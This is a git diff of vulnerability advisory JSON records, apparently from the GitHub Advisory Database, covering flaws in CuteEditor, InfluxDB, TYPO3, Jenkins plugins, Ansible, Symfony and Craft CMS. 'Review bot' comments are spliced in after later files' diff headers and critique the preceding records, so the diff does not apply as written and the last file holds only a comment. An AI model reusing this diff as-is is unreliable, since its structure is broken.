 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-3397"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/yiisoft/yii2/CVE-2015-3397.yaml"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/yiisoft/yii2/blob/2.0.4/framework/CHANGELOG.md"
@@ -45,6 +49,14 @@
 "type": "WEB",
 "url": "https://web.archive.org/web/20210122155403/http://www.securityfocus.com/bid/74663"
 },
+ {
+ "type": "WEB",
+ "url": "https://www.yiiframework.com/news/86/yii-2-0-4-is-released/"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.securityfocus.com/bid/74663"
+ },
 {
 "type": "WEB",
 "url": "http://www.yiiframework.com/news/86/yii-2-0-4-is-released/"
diff --git a/advisories/github-reviewed/2022/05/GHSA-w327-wq28-3vmf/GHSA-w327-wq28-3vmf.json b/advisories/github-reviewed/2022/05/GHSA-w327-wq28-3vmf/GHSA-w327-wq28-3vmf.json
new file mode 100644
index 0000000000000..7b202bf451b34
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-w327-wq28-3vmf/GHSA-w327-wq28-3vmf.json
@@ -0,0 +1,62 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-w327-wq28-3vmf",
+ "modified": "2024-02-08T22:07:12Z",
+ "published": "2022-05-02T03:56:59Z",
+ "aliases": [
+ "CVE-2009-4665"
+ ],
+ "summary": "CuteSoft CuteEditor Path Traversal vulnerability",
+ "details": "Directory traversal vulnerability in `CuteSoft_Client/CuteEditor/Load.ashx` in CuteSoft Components Cute Editor for ASP.NET allows remote attackers to read arbitrary files via a `..` (dot dot) in the file parameter.",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "NuGet",
+ "name": "CuteEditor"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "6.6"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-4665"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/50727"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20200228205122/http://www.securityfocus.com/bid/35085"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.exploit-db.com/exploits/8785"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-08T22:07:12Z",
+ "nvd_published_at": "2010-03-05T18:30:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-w55x-q3gv-px85/GHSA-w55x-q3gv-px85.json b/advisories/github-reviewed/2022/05/GHSA-w55x-q3gv-px85/GHSA-w55x-q3gv-px85.json
new file mode 100644
index 0000000000000..1966a8d91fafe
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-w55x-q3gv-px85/GHSA-w55x-q3gv-px85.json
@@ -0,0 +1,64 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-w55x-q3gv-px85",
+ "modified": "2024-02-01T21:15:36Z",
+ "published": "2022-05-24T22:01:18Z",
+ "aliases": [
+ "CVE-2018-17572"
+ ],
+ "summary": "InfluxDB Reflected Cross-site Scripting ",
+ "details": "InfluxDB 0.9.5 has Reflected XSS in the admin panel via the Write Data module.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/influxdata/influxdb"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "0.9.6"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 0.9.5"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-17572"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/influxdata/influxdb/issues/21444#issuecomment-837442467"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/influxdata/influxdb/releases/tag/v0.9.6"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-01T21:15:36Z",
+ "nvd_published_at": "2020-03-02T20:15:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-w736-qv86-vq94/GHSA-w736-qv86-vq94.json b/advisories/github-reviewed/2022/05/GHSA-w736-qv86-vq94/GHSA-w736-qv86-vq94.json
new file mode 100644
index 0000000000000..cb5cf245a3e15
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-w736-qv86-vq94/GHSA-w736-qv86-vq94.json
@@ -0,0 +1,124 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-w736-qv86-vq94",
+ "modified": "2024-02-07T23:57:37Z",
+ "published": "2022-05-17T05:28:57Z",
+ "aliases": [
+ "CVE-2010-3714"
+ ],
+ "summary": "TYPO3 Remote File Disclosure vulnerability in the jumpUrl mechanism",
+ "details": "The jumpUrl (aka access tracking) implementation in `tslib/class.tslib_fe.php` in TYPO3 4.2.x before 4.2.15, 4.3.x before 4.3.7, and 4.4.x before 4.4.4 does not properly compare certain hash values during access-control decisions, which allows remote attackers to read arbitrary files via unspecified vectors.",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.2.0"
+ },
+ {
+ "fixed": "4.2.15"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.3.0"
+ },
+ {
+ "fixed": "4.3.7"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.4.0"
+ },
+ {
+ "fixed": "4.4.4"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3714"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/TYPO3/typo3/commit/687b671c765eac10ffb764547bb403ac3ef55620"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/TYPO3/typo3/commit/a8ccd387cafd2c2c338fc29109c16418f7657229"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/TYPO3/typo3/commit/d95f06f633fd2c289b544f6d5907b789eae6cccb"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/TYPO3/typo3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20111220151231/http://www.securityfocus.com/bid/43786"
+ },
+ {
+ "type": "WEB",
+ "url": "http://blog.nibblesec.org/2010/12/typo3-sa-2010-020-typo3-sa-2010-022.html"
+ },
+ {
+ "type": "WEB",
+ "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020/"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.debian.org/security/2010/dsa-2121"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.exploit-db.com/exploits/15856"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-284"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-07T23:57:37Z",
+ "nvd_published_at": "2010-10-25T20:01:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-wg7x-vf54-9qjw/GHSA-wg7x-vf54-9qjw.json b/advisories/github-reviewed/2022/05/GHSA-wg7x-vf54-9qjw/GHSA-wg7x-vf54-9qjw.json
new file mode 100644
index 0000000000000..887b6411f2742
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-wg7x-vf54-9qjw/GHSA-wg7x-vf54-9qjw.json
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wg7x-vf54-9qjw",
+ "modified": "2024-01-30T22:12:51Z",
+ "published": "2022-05-13T01:25:43Z",
+ "aliases": [
+ "CVE-2019-1003058"
+ ],
+ "summary": "CSRF vulnerability in Jenkins FTP publisher Plugin",
+ "details": "A cross-site request forgery vulnerability in Jenkins FTP publisher Plugin in the FTPPublisher.DescriptorImpl#doLoginCheck method allows attackers to initiate a connection to an attacker-specified server.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jvnet.hudson.plugins:ftppublisher"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "1.2"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003058"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-974"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.securityfocus.com/bid/107790"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T22:12:51Z",
+ "nvd_published_at": "2019-04-04T16:29:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-whcg-2364-672f/GHSA-whcg-2364-672f.json b/advisories/github-reviewed/2022/05/GHSA-whcg-2364-672f/GHSA-whcg-2364-672f.json
new file mode 100644
index 0000000000000..4561cb1303cc5
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-whcg-2364-672f/GHSA-whcg-2364-672f.json
@@ -0,0 +1,68 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-whcg-2364-672f",
+ "modified": "2024-01-30T21:54:25Z",
+ "published": "2022-05-13T01:15:02Z",
+ "aliases": [
+ "CVE-2019-10290"
+ ],
+ "summary": "Missing permission check in Jenkins Netsparker Cloud Scan Plugin",
+ "details": "A missing permission check in Jenkins Netsparker Cloud Scan Plugin 1.1.5 and older in the NCScanBuilder.DescriptorImpl#doValidateAPI form validation method allowed attackers with Overall/Read permission to initiate a connection to an attacker-specified server.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:netsparker-cloud-scan"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.1.6"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 1.1.5"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10290"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1032"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.securityfocus.com/bid/107790"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T21:54:25Z",
+ "nvd_published_at": "2019-04-04T16:29:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-wmq3-24jm-m8xh/GHSA-wmq3-24jm-m8xh.json b/advisories/github-reviewed/2022/05/GHSA-wmq3-24jm-m8xh/GHSA-wmq3-24jm-m8xh.json
new file mode 100644
index 0000000000000..4f9546f291bd0
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-wmq3-24jm-m8xh/GHSA-wmq3-24jm-m8xh.json
@@ -0,0 +1,68 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wmq3-24jm-m8xh",
+ "modified": "2024-01-30T21:09:04Z",
+ "published": "2022-05-13T01:15:01Z",
+ "aliases": [
+ "CVE-2019-10280"
+ ],
+ "summary": "Jenkins Assembla Auth Plugin stores credentials in plain text ",
+ "details": "Jenkins Assembla Auth Plugin stores credentials unencrypted in the global config.xml configuration file on the Jenkins master where they can be viewed by users with access to the master file system.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:assembla-auth"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.13"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 1.11"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10280"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1093"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.securityfocus.com/bid/107790"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-522"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T21:09:04Z",
+ "nvd_published_at": "2019-04-04T16:29:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-wp79-cpv2-9g7m/GHSA-wp79-cpv2-9g7m.json b/advisories/github-reviewed/2022/05/GHSA-wp79-cpv2-9g7m/GHSA-wp79-cpv2-9g7m.json
new file mode 100644
index 0000000000000..ff1500b3658e3
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-wp79-cpv2-9g7m/GHSA-wp79-cpv2-9g7m.json
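Review bot: The affected range declares `"fixed": "1.13"` while `last_known_affected_version_range` says `"<= 1.11"`, so version 1.12 is inside the vulnerable range but outside the stated last-known-affected bound; the two fields should agree, i.e. either `"fixed": "1.12"` or `"last_known_affected_version_range": "<= 1.12"`, whichever the linked jenkins.io advisory (SECURITY-1093) supports. The `details` text names no plugin version at all, so the range cannot be cross-checked from the advisory body itself; adding the version there (e.g. "Jenkins Assembla Auth Plugin 1.11 and earlier") would make the record self-consistent.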
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wp79-cpv2-9g7m",
+ "modified": "2024-01-30T22:38:21Z",
+ "published": "2022-05-14T03:45:21Z",
+ "aliases": [
+ "CVE-2017-1000502"
+ ],
+ "summary": "Arbitrary shell command execution in Jenkins EC2 Plugin",
+ "details": "Users with permission to create or configure agents in Jenkins 1.37 and earlier could configure an EC2 agent to run arbitrary shell commands on the master node whenever the agent was supposed to be launched. Configuration of these agents now requires the 'Run Scripts' permission typically only granted to administrators.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:ec2"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.38"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 1.37"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000502"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2017-12-06/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T22:38:21Z",
+ "nvd_published_at": "2018-01-24T23:29:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-wqq5-c89p-3wc3/GHSA-wqq5-c89p-3wc3.json b/advisories/github-reviewed/2022/05/GHSA-wqq5-c89p-3wc3/GHSA-wqq5-c89p-3wc3.json
new file mode 100644
index 0000000000000..4ecaf173de8c8
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-wqq5-c89p-3wc3/GHSA-wqq5-c89p-3wc3.json
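Review bot: The `details` text says "Users with permission to create or configure agents in Jenkins 1.37 and earlier", which reads as a Jenkins core version, whereas the `summary` and the `affected` package (`org.jenkins-ci.plugins:ec2`, fixed in 1.38) refer to the EC2 Plugin. Rewording to `"details": "Users with permission to create or configure agents in Jenkins EC2 Plugin 1.37 and earlier could configure an EC2 agent ..."` would make the prose match the package the ranges actually cover. This appears to be inherited from the upstream CVE text, so the wording fix would be a GHSA-side edit rather than a data-import change.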
@@ -0,0 +1,61 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wqq5-c89p-3wc3",
+ "modified": "2024-01-30T23:56:00Z",
+ "published": "2022-05-17T19:57:30Z",
+ "aliases": [
+ "CVE-2014-4966"
+ ],
+ "summary": "Ansible Arbitrary Code Execution",
+ "details": "Ansible before 1.6.7 does not prevent inventory data with \"{{\" and \"lookup\" substrings, and does not prevent remote data with \"{{\" substrings, which allows remote attackers to execute arbitrary code via (1) crafted lookup('pipe') calls or (2) crafted Jinja2 data.\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "ansible"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.6.7"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-4966"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ansible/ansible/commit/62a1295a3e08cb6c3e9f1b2a1e6e5dcaeab32527"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.ocert.org/advisories/ocert-2014-004.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-74"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T23:56:00Z",
+ "nvd_published_at": "2020-02-18T15:15:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-wrr5-p265-7252/GHSA-wrr5-p265-7252.json b/advisories/github-reviewed/2022/05/GHSA-wrr5-p265-7252/GHSA-wrr5-p265-7252.json
new file mode 100644
index 0000000000000..00434739d1ff2
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-wrr5-p265-7252/GHSA-wrr5-p265-7252.json
@@ -0,0 +1,72 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wrr5-p265-7252",
+ "modified": "2024-01-30T21:27:43Z",
+ "published": "2022-05-24T22:00:03Z",
+ "aliases": [
+ "CVE-2019-10325"
+ ],
+ "summary": "Jenkins Warnings NG Plugin Cross-site scripting vulnerability",
+ "details": "A cross-site scripting vulnerability in Jenkins Warnings NG Plugin 5.0.0 and earlier allowed attacker with Job/Configure permission to inject arbitrary JavaScript in build overview pages.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "io.jenkins.plugins:warnings-ng"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "5.1.0"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 5.0.0"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10325"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/jenkinsci/warnings-ng-plugin/blob/main/CHANGELOG.md#510---2019-5-31"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2019-05-31/#SECURITY-1373"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2019/05/31/2"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.securityfocus.com/bid/108540"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T21:27:43Z",
+ "nvd_published_at": "2019-05-31T15:29:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-wvfw-w3x6-g526/GHSA-wvfw-w3x6-g526.json b/advisories/github-reviewed/2022/05/GHSA-wvfw-w3x6-g526/GHSA-wvfw-w3x6-g526.json
index 5d135c0756681..4a1ae2af68bce 100644
--- a/advisories/github-reviewed/2022/05/GHSA-wvfw-w3x6-g526/GHSA-wvfw-w3x6-g526.json
+++ b/advisories/github-reviewed/2022/05/GHSA-wvfw-w3x6-g526/GHSA-wvfw-w3x6-g526.json
@@ -139,6 +139,10 @@
 "type": "WEB",
 "url": "https://github.com/silverstripe/silverstripe-framework/issues/8814"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2019-5715.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/silverstripe/silverstripe-framework"
diff --git a/advisories/github-reviewed/2022/05/GHSA-wvj5-r78r-hhfq/GHSA-wvj5-r78r-hhfq.json b/advisories/github-reviewed/2022/05/GHSA-wvj5-r78r-hhfq/GHSA-wvj5-r78r-hhfq.json
index eb2546d9a4652..bf3066bc6b582 100644
--- a/advisories/github-reviewed/2022/05/GHSA-wvj5-r78r-hhfq/GHSA-wvj5-r78r-hhfq.json
+++ b/advisories/github-reviewed/2022/05/GHSA-wvj5-r78r-hhfq/GHSA-wvj5-r78r-hhfq.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-wvj5-r78r-hhfq",
- "modified": "2023-07-31T18:26:03Z",
+ "modified": "2024-02-08T19:24:05Z",
 "published": "2022-05-14T03:10:21Z",
 "aliases": [
 "CVE-2016-2403"
@@ -15,6 +15,82 @@
 }
 ],
 "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/security-core"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.8.0"
+ },
+ {
+ "fixed": "2.8.6"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/security-core"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "3.0.0"
+ },
+ {
+ "fixed": "3.0.6"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/security"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.8.0"
+ },
+ {
+ "fixed": "2.8.6"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/security"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "3.0.0"
+ },
+ {
+ "fixed": "3.0.6"
+ }
+ ]
+ }
+ ]
+ },
 {
 "package": {
 "ecosystem": "Packagist",
@@ -25,7 +101,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "0"
+ "introduced": "2.8.0"
 },
 {
 "fixed": "2.8.6"
@@ -44,7 +120,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "3.0"
+ "introduced": "3.0.0"
 },
 {
 "fixed": "3.0.6"
@@ -59,6 +135,22 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-2403"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-core/CVE-2016-2403.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2016-2403.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2016-2403.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://symfony.com/cve-2016-2403"
+ },
 {
 "type": "WEB",
 "url": "https://web.archive.org/web/20210123224944/http://www.securityfocus.com/bid/96137"
diff --git a/advisories/github-reviewed/2022/05/GHSA-wvr4-w6cw-4px8/GHSA-wvr4-w6cw-4px8.json b/advisories/github-reviewed/2022/05/GHSA-wvr4-w6cw-4px8/GHSA-wvr4-w6cw-4px8.json
new file mode 100644
index 0000000000000..ef66859baee89
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-wvr4-w6cw-4px8/GHSA-wvr4-w6cw-4px8.json
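Review bot: The first hunk replaces `"introduced": "0"` with `"introduced": "2.8.0"` on the pre-existing range (the package name sits outside the hunk, but the FriendsOfPHP reference added in the third hunk suggests it is `symfony/symfony`), which silently drops every version below 2.8.0 from the affected set rather than merely tightening a bound; if any earlier branch was affected, it now needs its own range entry, since nothing else covers it. The `https://symfony.com/cve-2016-2403` and FriendsOfPHP YAML references added in the third hunk are the natural place to confirm the full branch list before this narrowing lands. The second hunk's `"3.0"` to `"3.0.0"` normalisation is fine as it keeps the same lower bound.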
@@ -0,0 +1,57 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wvr4-w6cw-4px8",
+ "modified": "2024-02-01T21:27:09Z",
+ "published": "2022-05-24T16:59:48Z",
+ "aliases": [
+ "CVE-2019-15929"
+ ],
+ "summary": "Craft CMS possibility of brute force attempts",
+ "details": "In Craft CMS before 3.1.7, the elevated session password prompt was not being rate limited like normal login forms, leading to the possibility of a brute force attempt on them.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "craftcms/cms"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "3.1.7"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-15929"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/craftcms/cms/blob/3.1.7/CHANGELOG-v3.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-640"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-01T21:27:09Z",
+ "nvd_published_at": "2019-10-24T16:15:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-wwrr-4jp4-58wg/GHSA-wwrr-4jp4-58wg.json b/advisories/github-reviewed/2022/05/GHSA-wwrr-4jp4-58wg/GHSA-wwrr-4jp4-58wg.json
new file mode 100644
index 0000000000000..50330a4d214bc
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-wwrr-4jp4-58wg/GHSA-wwrr-4jp4-58wg.json
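Review bot: `cwe_ids` is set to `"CWE-640"` (weak password-recovery mechanism), but the `details` describe a password prompt that was not rate limited, which is the missing-brute-force-protection case covered by CWE-307 (Improper Restriction of Excessive Authentication Attempts); unless the source advisory concerns password recovery specifically, `"cwe_ids": ["CWE-307"]` looks like the more accurate classification. The CVSS vector `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` and the resulting `"severity": "CRITICAL"` also seem steep for an issue whose only stated effect is the possibility of brute-forcing an already-authenticated user's elevated-session prompt, and are worth checking against the NVD entry before publication.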
